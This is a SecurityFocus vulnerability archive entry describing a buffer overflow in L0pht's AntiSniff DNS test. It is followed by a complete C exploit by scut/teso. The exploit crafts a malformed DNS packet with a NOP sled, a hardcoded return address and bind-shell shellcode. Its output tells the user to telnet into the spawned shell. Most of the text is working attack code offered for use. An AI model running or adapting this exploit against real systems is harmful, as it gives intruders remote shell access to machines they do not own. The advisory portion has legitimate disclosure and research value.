source: http://www.securityfocus.com/bid/1207/info Certain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system. This scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well. NOTE: This information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory. /* l0phtl0phe.c - antisniff exploit (1-1-1 "second fixed version" included) * * -scut/teso * * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines` * * description: * l0pht messed up the fix for their problem in antisniff by not regarding * the type signedness properties of the char and int values used. this * results in a cool method bypassing the too extra checks (length + strncat). * some work on this topic have been done by mixter, (bad results on type * casting), but it should be obvious to any security conscious programmers. * i'm not stating that they aren't allowed errors, but they should fix it * for sure if they're going to fix it at all. -sc. * * 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim. * * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl. */ #include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <arpa/nameser.h> #include <libnet.h> #define OFFSET 0xbffef9a0 unsigned int build_xp (unsigned char *xp); int main (int argc, char *argv[]) { int sock; /* raw socket */ u_long src_ip, dst_ip; unsigned char xpbuf[1024]; /* this one gets complicated now */ unsigned char tpack[2048]; /* paket buffer */ unsigned int pl_len; if (argc != 3) { printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]); exit (EXIT_FAILURE); } sock = libnet_open_raw_sock (IPPROTO_RAW); if (sock == -1) { perror ("libnet_open_raw_sock"); exit (EXIT_FAILURE); } src_ip = libnet_name_resolve (argv[1], 0); dst_ip = libnet_name_resolve (argv[2], 0); pl_len = build_xp (xpbuf); libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP, src_ip, dst_ip, NULL, 0, tpack); libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0, tpack + IP_H); libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0, xpbuf, pl_len, tpack + IP_H + UDP_H); libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len); /* they use "udp and dst port 53" as bpf, so we should have no problem */ libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len); libnet_close_raw_sock (sock); printf ("exploitation succeeded.\n"); printf ("try: \"telnet %s 17664\" now.\n", argv[2]); exit (EXIT_SUCCESS); } /* build_xp * * build exploit buffer into buffer pointed to by `xp'. */ unsigned int build_xp (unsigned char *xp) { int i; unsigned char buf[1024]; unsigned char shellcode[] = /* portshell 17644 portshellcode by smiler & scut */ "\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0" "\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1" "\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe" "\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66" "\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16" "\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08" "\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0" "\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0" "\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe" "\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31" "\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c" "\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8" "\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; unsigned char head[] = "\x07-7350-\x00\xfe"; memcpy (buf, head, 9); for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i) buf[i] = '\x90'; memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode, strlen (shellcode)); buf[272] = '\xeb'; buf[273] = '\x08'; buf[274] = (OFFSET ) & 0xff; buf[275] = (OFFSET >> 8) & 0xff; buf[276] = (OFFSET >> 16) & 0xff; buf[277] = (OFFSET >> 24) & 0xff; memcpy (xp, buf, sizeof (buf)); return (sizeof (buf));; }